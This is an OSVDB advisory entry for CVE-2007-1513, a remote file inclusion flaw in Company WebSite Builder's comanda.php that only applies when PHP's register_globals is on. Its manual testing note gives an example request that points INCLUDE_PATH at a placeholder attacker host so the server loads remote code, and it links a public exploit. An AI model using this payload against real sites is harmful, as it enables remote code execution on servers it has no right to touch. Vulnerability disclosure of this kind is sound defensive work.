Company WebSite Builder (CWB) comanda.php INCLUDE_PATH Variable Remote File Inclusion

2007-03-15T14:37:28
ID OSVDB:34946
Type osvdb
Reporter OSVDB
Modified 2007-03-15T14:37:28

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/cwb/comanda.php?INCLUDE_PATH=http://[attacker]/inject.txt?

References:

Other Advisory URL: http://advisories.echo.or.id/adv/adv76-theday-2007.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0182.html
ISS X-Force ID: 33035
Generic Exploit URL: http://www.milw0rm.com/exploits/3485
CVE: CVE-2007-1513
Bugtraq ID: 22974